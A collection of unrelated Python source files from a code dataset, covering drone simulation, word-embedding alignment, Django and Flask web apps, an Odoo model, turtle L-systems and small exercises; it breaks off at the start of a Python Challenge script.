-1 * random.randint(2, 6)\n y2 = random.randint(2, 5)\n z2 = random.randint(-7, -4)\n speed1 = random.randint(1, 3)\n speed2 = speed1 + 1\n f1 = client.moveToPositionAsync(x1, y1, z1, speed1, vehicle_name=\"Drone1\")\n f2 = client.moveToPositionAsync(x2, y2, z2, speed2, vehicle_name=\"Drone2\")\n f1.join()\n f2.join()\n print(\"x:\" + str(x1))\n print(\"y: \" + str(y1))\n print(\"z: \" + str(z1))\n\n # f1 = client.rotateToYawAsync(180., vehicle_name =\"Drone1\")\n # f2 = client.rotateToYawAsync(180., vehicle_name =\"Drone2\")\n # f1.join()\n # f2.join()\n # print(\"turned\")\n\n while not rospy.is_shutdown():\n x1 = x1 + -1 * random.randint(2, 4)\n y1 = random.randint(y1-3, y1+4)\n z1 = random.randint(z1-1, z1+1)\n x2 = x1 + random.randint(2, 4)\n y2 = random.randint(y1+2, y1+5)\n z2 = random.randint(z1-1, z1+1)\n speed1 = random.randint(1, 3)\n speed2 = speed1 + 1\n\n client.enableApiControl(True, \"Drone1\")\n client.enableApiControl(True, \"Drone2\")\n client.armDisarm(True, \"Drone1\")\n client.armDisarm(True, \"Drone2\")\n f1 = client.moveToPositionAsync(x1, y1, z1, speed1, vehicle_name=\"Drone1\",\n drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom,\n yaw_mode=airsim.YawMode(is_rate=True, yaw_or_rate=20))\n f2 = client.moveToPositionAsync(x2, y2, z2, speed2, vehicle_name=\"Drone2\")\n # f1.join()\n # f2.join()\n\n print(\"\\n\\n\\n\\nx:\" + str(x1))\n print(\"y: \" + str(y1))\n print(\"z: \" + str(z1))\n print(\"\\n\\nDrone1:\")\n print(client.getMultirotorState(vehicle_name=\"Drone1\"))\n print(\"\\n\\nDrone2:\")\n print(client.getMultirotorState(vehicle_name=\"Drone2\"))\n\n rospy.sleep(2)\n\n client.armDisarm(False, \"Drone1\")\n client.armDisarm(False, \"Drone2\")\n client.reset()\n\n # that's enough fun for now. let's quit cleanly\n client.enableApiControl(False, \"Drone1\")\n client.enableApiControl(False, \"Drone2\")\n\n\nif __name__ == '__main__':\n try:\n drone_chase()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/experiments/droneChase.py","file_name":"droneChase.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314038770","text":"my_list = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]\nl= []\nfor item in my_list:\n if item%2 ==0:\n l.append(item)\nprint(l)\n\nrl= [x for x in my_list if not x%2]\nprint(rl)\n\n\nz= True \nwhile z == True:\n a = int(input(\"Enter mark: \"))\n if a > 85:\n print('distinction')\n elif 65 <= a <= 85:\n print('pass')\n elif a == 0:\n z=False\n print(\"finished\")\n else:\n print('Fail')\n","sub_path":"Python(Beg)/work5.py","file_name":"work5.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"265314890","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, time, gensim, sys, json\nfrom gensim.models import translation_matrix\nfrom gensim.models import KeyedVectors\nimport matplotlib.pyplot as plt\nfrom scipy import spatial\nimport numpy as np\nimport multiprocessing\nfrom joblib import Parallel, delayed\n\n\"\"\" Distributional model for Linguistic shift time sereis construction\n For each time slot,\n [1] load in gensime word2vec models generated wiht gensim_models.py \n [2] align all vectors to the last vector\n [3] compute the distances between each vector and the first vector (just model[\"searchword\"] vectors)\n [3] plot a time series of the distances between vectors\n\"\"\"\n\n\ndef smart_procrustes_align_gensim(base_embed, other_embed, words=None):\n \"\"\" Procrustes align two gensim word2vec models (to allow for comparison between same word across models).\n Code ported from HistWords by William Hamilton .\n (With help from William. Thank you!)\n First, intersect the vocabularies (see `intersection_align_gensim` documentation).\n Then do the alignment on the other_embed model.\n Replace the other_embed model's syn0 and syn0norm numpy matrices with the aligned version.\n Return other_embed.\n If `words` is set, intersect the two models' vocabulary with the vocabulary in words (see `intersection_align_gensim` documentation).\n \"\"\"\n # make sure vocabulary and indices are aligned\n in_base_embed, in_other_embed = intersection_align_gensim(base_embed, other_embed, words=words)\n\n # get the embedding matrices\n base_vecs = in_base_embed.wv.syn0norm\n other_vecs = in_other_embed.wv.syn0norm\n\n # just a matrix dot product with numpy\n m = other_vecs.T.dot(base_vecs)\n # SVD method from numpy\n u, _, v = np.linalg.svd(m)\n # another matrix operation\n ortho = u.dot(v)\n # Replace original array with modified one\n # i.e. multiplying the embedding matrix (syn0norm)by \"ortho\"\n other_embed.wv.syn0norm = other_embed.wv.syn0 = (other_embed.wv.syn0norm).dot(ortho)\n return other_embed\n\n\ndef intersection_align_gensim(m1,m2, words=None):\n \"\"\"\n Intersect two gensim word2vec models, m1 and m2.\n Only the shared vocabulary between them is kept.\n If 'words' is set (as list or set), then the vocabulary is intersected with this list as well.\n Indices are re-organized from 0..N in order of descending frequency (=sum of counts from both m1 and m2).\n These indices correspond to the new syn0 and syn0norm objects in both gensim models:\n -- so that Row 0 of m1.syn0 will be for the same word as Row 0 of m2.syn0\n -- you can find the index of any word on the .index2word list: model.index2word.index(word) => 2\n The .vocab dictionary is also updated for each model, preserving the count but updating the index.\n \"\"\"\n\n # Get the vocab for each model\n vocab_m1 = set(m1.wv.vocab.keys())\n vocab_m2 = set(m2.wv.vocab.keys())\n\n # Find the common vocabulary\n common_vocab = vocab_m1&vocab_m2\n if words: common_vocab&=set(words)\n\n # If no alignment necessary because vocab is identical...\n if not vocab_m1-common_vocab and not vocab_m2-common_vocab:\n return (m1,m2)\n\n # Otherwise sort by frequency (summed for both)\n common_vocab = list(common_vocab)\n common_vocab.sort(key=lambda w: m1.wv.vocab[w].count + m2.wv.vocab[w].count,reverse=True)\n\n # Then for each model...\n for m in [m1,m2]:\n # Replace old syn0norm array with new one (with common vocab)\n indices = [m.wv.vocab[w].index for w in common_vocab]\n old_arr = m.wv.syn0norm\n new_arr = np.array([old_arr[index] for index in indices])\n m.wv.syn0norm = m.wv.syn0 = new_arr\n\n # Replace old vocab dictionary with new one (with common vocab)\n # and old index2word with new one\n m.index2word = common_vocab\n old_vocab = m.wv.vocab\n new_vocab = {}\n for new_index,word in enumerate(common_vocab):\n old_vocab_obj=old_vocab[word]\n new_vocab[word] = gensim.models.word2vec.Vocab(index=new_index, count=old_vocab_obj.count)\n m.wv.vocab = new_vocab\n\n return (m1,m2)\n\n\ndef get_neighbor (fname, word):\n sid = fname.split('/')[-1].split('.')[0]\n date = get_date(sid)\n model = gensim.models.Word2Vec.load(fname)\n model.init_sims()\n matches = \"\"\n\n if word in model.wv.vocab:\n matches = model.wv.most_similar(word, topn=10)\n else:\n print (\"skipping model: \", sid, date)\n \n\n return date, matches \n\ndef get_date (sessionid):\n datefile = './data/congressional-globe/dates.csv'\n with open(datefile, \"r\") as f:\n for line in f:\n if line[0] != '#':\n tokens = line.rstrip().split(',')\n if tokens[0] == sessionid:\n date = tokens[1]\n return date\n\ndef make_json (distances):\n session = {}\n sessions = []\n for j,k in distances: \n session['date'] = j \n session['similarity'] = k \n sessions.append(session.copy())\n return json.dumps(sessions)\n\ndef get_filelist(word):\n f = open(\"./data/embeddings/vocab/all.vocab\",\"r\")\n sessions = []\n contain_word = []\n\n for line in f:\n sessions.append(json.loads(line))\n\n for i in range (0, len(sessions)):\n session = sessions[i]\n if word in session[\"vocabulary\"]:\n contain_word.append(\"./data/embeddings/models/\"+session[\"id\"]+\".model\")\n\n return contain_word[0], contain_word\n\n\ndef main():\n word = sys.argv[1].lower()\n num_cores = int(sys.argv[2])\n\n base, filelist = get_filelist(word)\n\n #distances = Parallel(n_jobs=num_cores)(delayed(get_distances)(base, fname, word) for fname in filelist)\n distances = Parallel(n_jobs=num_cores)(delayed(get_neighbor)(fname, word) for fname in filelist)\n for d in distances:\n ws = []\n for s in d[1]:\n ws.append(s[0])\n print (d[0] + \": \" +\" \".join(ws))\n\n #json = make_json(distances)\n #print (json)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"api/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571520877","text":"from django import forms\r\nfrom django.utils.translation import ugettext as _\r\n\r\nfrom .models import ClinicalData, NULL_CHOICES, BLANK_CHOICES\r\n\r\nfrom string import digits\r\n\r\nDAYS_TO_BIRTH_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90-99', '90-99'),\r\n)\r\n\r\nPATHOLOGIC_STAGE_CHOICES = (\r\n ('StageI', 'StageI'), \r\n ('StageII', 'StageII'), \r\n ('StageIII', 'StageIII'), \r\n ('StageIV', 'StageIV'), \r\n)\r\n\r\nSMOKING_HISTORY_CHOICES = (\r\n ('1', '1'),\r\n ('2', '2'),\r\n ('3', '3'),\r\n ('4', '4'),\r\n ('5+', '5+'),\r\n)\r\n\r\nDAYS_TO_DEATH_CHOICES = (\r\n ('0-0.5', '0-0.5'), \r\n ('0.5-1', '0.5-1'), \r\n ('1-1.5', '1-1.5'), \r\n ('1.5-2', '1.5-2'), \r\n ('2-2.5', '2-2.5'), \r\n ('2.5-3', '2.5-3'), \r\n ('3-3.5', '3-3.5'), \r\n ('3.5-4', '3.5-4'), \r\n ('4-4.5', '4-4.5'), \r\n ('4.5-5', '4.5-5'), \r\n ('5', '5'), \r\n)\r\n\r\nAGE_AT_DIAGNOSIS_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90+', '90+'),\r\n)\r\n\r\ndef get_all_choices(field_name, empty_type):\r\n return ()\r\n tmp_data = ClinicalData.objects.distinct(field_name).order_by(field_name).values_list(field_name)\r\n result = []\r\n for i in tmp_data:\r\n if i is None:\r\n if empty_type is None:\r\n result.append(NULL_CHOICES[0])\r\n else:\r\n result.append(BLANK_CHOICES[0])\r\n else:\r\n result.append((i,i,))\r\n return tuple(result)\r\n\r\nDAYS_TO_DIAGNOSIS_CHOICES = get_all_choices('days_to_diagnosis', None)\r\n\r\nDAYS_TO_FOLLOWUP_CHOICES = tuple(zip([digits, digits]))\r\n\r\nICD_10_CHOICES = get_all_choices('icd_10', '')\r\nICD_O_3_HISTOLOGY_CHOICES = get_all_choices('icd_o_3_histology', '')\r\nICD_O_3_SITE_CHOICES = get_all_choices('icd_o_3_site', '')\r\n\r\nNUMBER_OF_LYMPH_EXAMINED_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90+', '90+'),\r\n)\r\n\r\nPATHOLOGIC_M_CHOICES = (\r\n ('M0', 'M0'),\r\n ('M1', 'M1'),\r\n ('Mx', 'Mx'),\r\n)\r\n\r\nPATHOLOGIC_N_CHOICES = (\r\n ('N0', 'N0'),\r\n ('N1', 'N1'),\r\n ('N2', 'N2'),\r\n ('Nx', 'Nx'),\r\n)\r\n\r\nPATHOLOGIC_T_CHOICES = (\r\n ('T0', 'T0'),\r\n ('T1', 'T1'),\r\n ('T2', 'T2'),\r\n ('Tx', 'Tx'),\r\n)\r\n\r\nYEAR_OF_DIAGNOSIS_CHOICES = get_all_choices('year_of_diagnosis', None)\r\n\r\nclass SampleFilterForm(forms.ModelForm):\r\n check = forms.BooleanField(label=_('Use this group'), )\r\n\r\n class Meta:\r\n model = ClinicalData\r\n exclude = ('id', 'samples', 'sample_ids', 'donor_id', )\r\n choices = {\r\n 'days_to_birth': DAYS_TO_BIRTH_CHOICES,\r\n 'pathologic_stage': PATHOLOGIC_STAGE_CHOICES,\r\n 'smoking_history': SMOKING_HISTORY_CHOICES,\r\n 'days_to_death': DAYS_TO_DEATH_CHOICES,\r\n 'age_at_diagnosis': AGE_AT_DIAGNOSIS_CHOICES,\r\n 'days_to_diagnosis': DAYS_TO_DIAGNOSIS_CHOICES,\r\n 'days_to_followup': DAYS_TO_FOLLOWUP_CHOICES,\r\n 'number_of_lymph_examined': NUMBER_OF_LYMPH_EXAMINED_CHOICES,\r\n 'pathologic_m': PATHOLOGIC_M_CHOICES,\r\n 'pathologic_n': PATHOLOGIC_N_CHOICES,\r\n 'pathologic_t': PATHOLOGIC_T_CHOICES,\r\n 'year_of_diagnosis': YEAR_OF_DIAGNOSIS_CHOICES,\r\n }\r\n\r\n'''\r\nclass PrivateDataUploadForm(forms.Form):\r\n datafile = models.FileField()\r\n\r\nclass StatsTableForm(forms.Form):\r\n draw = forms.InputField()\r\n\r\nclass PrivateDataDeleteForm(forms.Form):\r\n file_code = forms.InputField()\r\n\r\nclass JobSubmitForm(forms.Form):\r\n condition = forms.TextField()\r\n\r\nclass JobDeleteForm(forms.Form):\r\n job_code = forms.TextField()\r\n\r\nclass ContidtionFilterForm(forms.Form):\r\n condition_code = forms.TextField()\r\n\r\nclass CommentForm(forms.Form):\r\n job_code = forms.TextField()\r\n\r\nclass ToolForm(forms.Form):\r\n name = forms.TextField()\r\n\r\nclass ToolDeleteForm(forms.Form):\r\n tool_code = forms.TextForm()\r\n\r\nclass ArgumentForm(forms.Form):\r\n tool_code = forms.TextField()\r\n'''","sub_path":"website/main/forms.tmp.py","file_name":"forms.tmp.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"534951694","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport sys\nimport traceback\nfrom models import Movies, Actors, setup_db\nimport json\nfrom auth.auth import AuthError, requires_auth\n\n\napp = Flask(__name__)\ndb = setup_db(app)\nCORS(app)\n\n\n'''Set up CORS. Allow '*' for origins.'''\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\n'''Using the after request decorator to se Access-Control-Allow'''\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n\n@app.route('/Movies', methods=['GET'])\n@requires_auth('get:movies')\ndef get_movies(jwt):\n movies = Movies.query.all()\n if len(movies) == 0:\n abort(404)\n formatted_movies = [mov.format() for mov in movies]\n return jsonify({\n 'success': True,\n 'movies': formatted_movies\n }), 200\n\n\n@app.route('/Movies', methods=['POST'])\n@requires_auth('post:movies')\ndef add_movies(jwt):\n data = request.get_json()\n if 'title' not in data:\n abort(422)\n if 'release_date' not in data:\n abort(422)\n new_title = data.get('title')\n new_release_date = data.get('release_date')\n try:\n new_movie = Movies(\n title=new_title,\n release_date=new_release_date\n )\n new_movie.insert()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'movie': new_movie.format()\n }), 200\n\n\n@app.route('/Movies/', methods=['DELETE'])\n@requires_auth('delete:movies')\ndef delete_movie(jwt, id):\n try:\n movie_to_delete = Movies.query.get(id)\n movie_to_delete.delete()\n id = movie_to_delete.id\n return jsonify({\n 'success': True,\n 'deleted': id\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Movies/', methods=['PATCH'])\n@requires_auth('patch:movies')\ndef update_movie(jwt, id):\n movie_to_update = Movies.query.get(id)\n if movie_to_update is None:\n abort(404)\n\n data = request.get_json()\n if 'title' in data:\n if data.get('title') is None:\n abort(400)\n movie_to_update.title = data.get('title')\n\n if 'release_date' in data:\n if data.get('release_date') is None:\n abort(400)\n movie_to_update.release_date = data.get('release_date')\n try:\n movie_to_update.update()\n\n return jsonify({\n 'success': True,\n 'movie': movie_to_update.format()\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Actors', methods=['GET'])\n@requires_auth('get:actors')\ndef get_actors(jwt):\n actors = Actors.query.all()\n if len(actors) == 0:\n abort(404)\n formatted_actors = [act.format() for act in actors]\n return jsonify({\n 'success': True,\n 'actors': formatted_actors\n }), 200\n\n\n@app.route('/Actors', methods=['POST'])\n@requires_auth('post:actors')\ndef add_actors(jwt):\n data = request.get_json()\n if 'name' not in data:\n abort(422)\n if 'age' not in data:\n abort(422)\n if 'gender' not in data:\n abort(422)\n try:\n new_actor = Actors(\n name=data.get('name'),\n age=data.get('age'),\n gender=data.get('gender')\n )\n new_actor.insert()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'actor': new_actor.format()\n }), 200\n\n\n@app.route('/Actors/', methods=['DELETE'])\n@requires_auth('delete:actors')\ndef delete_actor(jwt, id):\n try:\n actor = Actors.query.filter(Actors.id == id).one_or_none()\n actor.delete()\n return jsonify({\n 'success': True,\n 'deleted': id\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Actors/', methods=['PATCH'])\n@requires_auth('patch:actors')\ndef update_actor(jwt, id):\n actor_to_update = Actors.query.get(id)\n if actor_to_update is None:\n abort(404)\n data = request.get_json()\n if 'name' in data:\n if data.get('name') is None:\n abort(400)\n actor_to_update.name = data.get('name')\n if 'age' in data:\n if data.get('age') is None:\n abort(400)\n actor_to_update.age = data.get('age')\n if 'gender' in data:\n if data.get('gender') is None:\n abort(400)\n actor_to_update.gender = data.get('gender')\n try:\n actor_to_update.update()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'actor': actor_to_update.format(),\n }), 200\n\n\n@app.errorhandler(AuthError)\ndef auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": 'Bad Request'\n }), 400\n \n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": 'Unprocessable entity'\n }), 422\n\n\n\n@app.route('/')\ndef get_greeting():\n greeting = \"Welcome to my final FSND project\"\n return greeting\n\n\nif __name__ == '__main__':\n app.run(port=8080, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86110600","text":"\nfrom Foundations.WeightedGrid import WeightedGrid\nfrom Algorithms.RecursiveBacktracker import RecursiveBacktracker as rb\n\nchester = rb()\ngrid = chester.on(WeightedGrid(10, 10))\n\ngrid.braid(0.5)\nprint('braided')\n\nstart, finish = grid[0][0], grid[grid.rows-1][grid.columns-1]\nprint('started')\ndists = start.get_distances()\ngrid.set_distances(dists)\n\nimg = grid.to_png()\nimg.save('Output\\weightedmaze.png')\nprint('done with one')\n\nlava = grid.random_dist()\nlava.weight = 50\nprint('made lava')\n\ngrid.set_distances(start.get_distances().path_to(finish))\nprint('got distances')\n\nimg2 = grid.to_png()\nimg2.save('Output\\Astar.png')\n","sub_path":"Mazes/WeightedDemo.py","file_name":"WeightedDemo.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484274836","text":"from glob import glob\nimport os.path\nimport cv2\n\nsave_path = \"d:/Selected_Img\"\npeople = glob(\"d:/AIhub/2017/High_Resolution/High_Resolution/*\")\nn = 0\nfor person in people:\n n += 1\n # print(person)\n person_num = person[-8:]\n # print(person_num)\n for l in range(6):\n personpath = []\n personpath = (person[:-9] + '/'+ person_num +'/S001/L' + str(l+1) + '/E01/*.jpg')\n # print(personpath)\n imgs = glob(personpath)\n # print(imgs)\n for img in imgs:\n C_index = img.find('C')\n angle = int(img[C_index+1:-4])\n # print(angle)\n if angle > 13:\n continue\n # print(img)\n path = save_path + '/{0:03}-{1}-{2:02}.jpg'.format(n, l+1, angle)\n # print(path)\n image = cv2.imread(img)\n cv2.imwrite(path, image)\n\nprint(n)\n","sub_path":"Fix/jpg_selection_2017.py","file_name":"jpg_selection_2017.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636601862","text":"from odoo import api, models, fields, models, _\nfrom datetime import datetime,timedelta,time\n\nclass SaleQuotation(models.Model):\n _name = \"sale.quotation\"\n _description = \"Sale Quotation\"\n\n # @api.multi\n # @api.onchange('partner_id')\n # def onchange_partner_id(self):\n # \"\"\"\n # Update the following fields when the partner is changed:\n # - Pricelist\n # - Payment term\n # - Invoice address\n # - Delivery address\n # \"\"\"\n # if not self.partner_id:\n # self.update({\n # 'partner_invoice_id': False,\n # 'partner_shipping_id': False,\n # 'payment_term_id': False,\n # 'fiscal_position_id': False,\n # })\n # return\n\n # addr = self.partner_id.address_get(['delivery', 'invoice'])\n # values = {\n # 'pricelist_id': self.partner_id.property_product_pricelist and self.partner_id.property_product_pricelist.id or False,\n # 'payment_term_id': self.partner_id.property_payment_term_id and self.partner_id.property_payment_term_id.id or False,\n # 'partner_invoice_id': addr['invoice'],\n # 'partner_shipping_id': addr['delivery'],\n # }\n # if self.env.user.company_id.sale_note:\n # values['note'] = self.with_context(lang=self.partner_id.lang).env.user.company_id.sale_note\n\n # if self.partner_id.user_id:\n # values['user_id'] = self.partner_id.user_id.id\n # if self.partner_id.team_id:\n # values['team_id'] = self.partner_id.team_id.id\n # self.update(values)\n\n @api.onchange('partner_id')\n def onchange_partner_id_warning(self):\n if not self.partner_id:\n return\n warning = {}\n title = False\n message = False\n partner = self.partner_id\n\n # If partner has no warning, check its company\n if partner.sale_warn == 'no-message' and partner.parent_id:\n partner = partner.parent_id\n\n if partner.sale_warn != 'no-message':\n # Block if partner only has warning but parent company is blocked\n if partner.sale_warn != 'block' and partner.parent_id and partner.parent_id.sale_warn == 'block':\n partner = partner.parent_id\n title = (\"Warning for %s\") % partner.name\n message = partner.sale_warn_msg\n warning = {\n 'title': title,\n 'message': message,\n }\n if partner.sale_warn == 'block':\n self.update({'partner_id': False, 'partner_invoice_id': False, 'partner_shipping_id': False, 'pricelist_id': False})\n return {'warning': warning}\n\n if warning:\n return {'warning': warning}\n\n order_line = fields.One2many('sale.order.line', 'order_id', string='Order Lines', copy=True)\n name = fields.Char(string='Serial Number', copy=False, index=True, default=lambda self: _('New'))\n sale_id = fields.Many2one('sale.order', string='SO Reference')\n partner_id = fields.Many2one('res.partner',string='Customer')\n # partner_invoice_id = fields.Many2one('res.partner', string='Invoice Address', readonly=True, required=True, help=\"Invoice address for current sales order.\")\n # partner_shipping_id = fields.Many2one('res.partner', string='Delivery Address', readonly=True, required=True, help=\"Delivery address for current sales order.\") payment_term_id = fields.Many2one('account.payment.term', string='Payment Terms', oldname='payment_term')\n # # payment_term_id = fields.Many2one('account.payment.term', string='Payment Terms', oldname='payment_term')\n date_order = fields.Datetime(string='Order Date', required=True, readonly=True, index=True, copy=False, default=fields.Datetime.now)\n # validity_date = fields.Date(string='Expiration Date', readonly=True, copy=False ),\n # payment_term_id = fields.Many2one('account.payment.term', string='Payment Terms', oldname='payment_term')\n\n @api.model\n def create(self,values):\n seq = self.env['ir.sequence'].get('sale.quotation') \n values['name'] = seq\n result = super(SaleQuotation,self).create(values)\n return result","sub_path":"bt_sales_warranty/models/sale_quotation.py","file_name":"sale_quotation.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"464289472","text":"inp=input(\"Enter the name of the file: \")\r\ntry:\r\n fh=open(inp)\r\nexcept:\r\n print(\"FIle does not exist\")\r\n quit()\r\ncount=0\r\nfor line in fh:\r\n line=line.strip()\r\n if not line.startswith('From '):\r\n continue\r\n count=count+1\r\n word=line.split()\r\n print(word[1])\r\n\r\nprint(\"There were {} line with From as the first word\".format((count)))","sub_path":"emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489335019","text":"import turtle\nclass LSystem:\n\tdef __init__(self, axiom):\n\t\tself.axiom = axiom\n\t\tself.result = \"\"\n\t\tself.iterations = 5 #you can either set them to 0 or a default value and change it later\n\t\tself.distance = 10\n\t\tself.angle = 90\n\n\tdef createLSystem(self):\n\t\tself.result = self.axiom #you have to do this or you’ll overwrite the OG value\n\t\tfor i in range(self.iterations):\n\t\t\tnewStr = \"\"\n\t\t\tfor c in self.result:\n\t\t\t\tnewStr += self.rules(c)\n\t\t\tself.result = newStr\n\n\t#######################################################\n\t#This function is different than our original lsystem\n\t#It was made into one line using a dictionary\n\t#######################################################\n\tdef rules(self,ch):\n\t\treturn self.rules.get[char, char] #The second char returns the char itself if its not found in the dictionary\n\n\tdef drawLSystem(self):\n\t\tt = turtle.Turtle()\n\t\twn = turtle.Screen()\n\t\tfor ch in self.result:\n\t\t\tif(ch == \"f\"):\n\t\t\t\tt.forward(self.distance)\n\t\t\telif(ch == \"x\"):\n\t\t\t\tt.right(self.angle)\n\t\t\telif(ch == \"y\"):\n\t\t\t\tt.left(self.angle)\n\t\twn.exitonclick()\n\n\n\n\tdef __str__(self):\n\t\treturn self.result\n\n\n\ndef main():\n\trules = {'x':'f-x+x'}\n\tLs = LSystem('fx')\n\tLs.createLSystem()\n\tLs.drawLSystem()\n","sub_path":"cs110/notes/lsystem-dictionary.py","file_name":"lsystem-dictionary.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312591997","text":"import sys\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.rc('font', size=16)\n\nfor file in sys.argv[1:-1]:\n\txs = []\n\tys = []\n\tsigmas = []\n\t\n\tdata = open(file, \"r\")\n\tfor line in data:\n\t\tx, y = line.split()\n\t\txs.append(float(x))\n\t\tys.append(float(y))\n\t\t#sigmas.append(float(sigma))\n\tdata.close()\n\n\ttry:\n\t\tplt.errorbar(xs, ys, fmt=\"o\", label=file.split('/')[-2])\n\texcept IndexError:\n\t\tplt.errorbar(xs, ys, fmt=\"o\")\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\n\nplt.legend()\n\nplt.savefig(sys.argv[-1])\nplt.close()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425951182","text":"\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\n\nfrom .models import Habit, HabitRecord\nfrom .forms import HabitForm, HabitRecordForm\n\n\n\ndef habit_list(request):\n habits = Habit.objects.all()\n return render(request, 'habit_tracker/habit_list.html', {'habits': habits})\n\n\n# There might be some naming missmatch you can change what ever you need\n\ndef habit_detail(request, pk):\n habit = Habit.objects.get(pk=pk)\n return render(request, 'habit_tracker/habit_detail.html', {\"habit\": habit, \"pk\": pk})\n\n\ndef habit_new(request):\n if request.method == 'POST':\n form = HabitForm(request.POST)\n if form.is_valid():\n habit = form.save()\n return redirect('habit_detail', pk=habit.pk)\n else:\n form = HabitForm()\n\n return render(request, 'habit_tracker/habit_new.html', {\"form\": form})\n\ndef record_new(request, pk):\n if request.method == 'POST':\n form = HabitRecordForm(request.POST)\n if form.is_valid():\n record = form.save()\n return redirect('habit_detail', pk = pk)\n else: \n form = HabitRecordForm()\n\n return render(request, 'habit_tracker/record_new.html', {\"form\": form})\n\n\ndef record_edit(request, pk):\n record = get_object_or_404(HabitRecord)\n if request.method == 'POST':\n form = HabitRecordForm(request.POST, instance=record)\n if form.is_valid():\n form.save()\n return redirect('habit_detail', pk = pk)\n else:\n form = HabitRecordForm(instance=record)\n \n return render(request, 'habit_tracker/record_edit.html', {\"form\": form})\n\ndef habit_delete(request, pk):\n habit = get_object_or_404(Habit, pk=pk)\n habit.delete()\n return redirect('habit_list')\n\ndef calendar(request):\n return render(request, 'habit_tracker/calendar.html')","sub_path":"habit_tracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357385683","text":"# File Name: crypto_project_2.py\n# How to decode a hex xor\n\nimport binascii\n\n\ndef main():\n key = 0\n xor_string = '1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736'\n secret_code = binascii.unhexlify(xor_string)\n strings = (''.join(chr(num ^ key) for num in secret_code) for key in range(256))\n print(max(strings, key=fun(key)))\n\n\ndef fun(answer):\n return answer.count(' ')\n\n\nmain()\n","sub_path":"Python Programming/cryptography/crypto_project_3.py","file_name":"crypto_project_3.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"139055791","text":"# linked_list.py\n# Code to solve problem #4 for the Python Challenge, which can be found at pythonchallenge.com\n# Sean Brickley (October 11th, 2016)\n\nimport re\nimport urllib.request\n\nnothing = 